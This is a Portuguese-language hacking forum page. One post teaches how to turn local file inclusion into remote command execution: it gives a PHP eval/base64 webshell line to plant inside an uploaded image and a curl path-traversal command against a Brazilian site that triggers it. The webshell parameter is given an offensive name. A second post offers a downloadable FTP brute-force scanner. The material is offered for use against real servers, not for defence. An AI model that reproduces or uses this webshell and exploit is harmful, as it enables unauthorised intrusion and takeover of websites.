  23. Pegar RCE (Execução de Comando Remoto) através de um LFI (Local File Inclusion) O Que é LFi: Local File Inclusion é uma vulnerabilidade que permite “incluir” arquivos que serão incorporados à página. Caso o arquivo incluído contenha algum código, este código será executado. Mais Sobre : https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion Lista de Dorks - LFi : https://blog.cienciahacker.ch/downloads/dorks/lista de dork lfi.pdf Podemos tentar atraves de uma imagem. Upamos uma imagem (jpg ou png) no mesmo servidor e dentro esse codigo: <?php eval(base64_decode($_REQUEST['hitler'])); ?> Então quando tivermos nossa imagem upada nele. Nós então podemos tentar um RCE atraves do LFI de uma maneira : curl 'http://site.com.br/Arquivar/index.php?p=../../../../../../../../var/www/html/Arquivar/_resources/newsimages/f1413ea63a615d8faf85617c4adebf1c.jpg' -d hitler=$(echo "system=('id');" | base64 -w 1000) Creditos : MMxM and D3m0l1d0r Twitter: @d3m0l1d0r_ and @Sh4dowNetwork
  24. [VULNERABILIDADE]

    Olá jovens, trago para vocês um brute ftp usando lista de domínios VirusTotal: https://www.virustotal.com/pt/file/b23d97b078b6c1f4eabe43a37ceb7077fc9afbea45f2e689a432d773ce58bea4/analysis/1477186441/ scan-ftp.zip

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.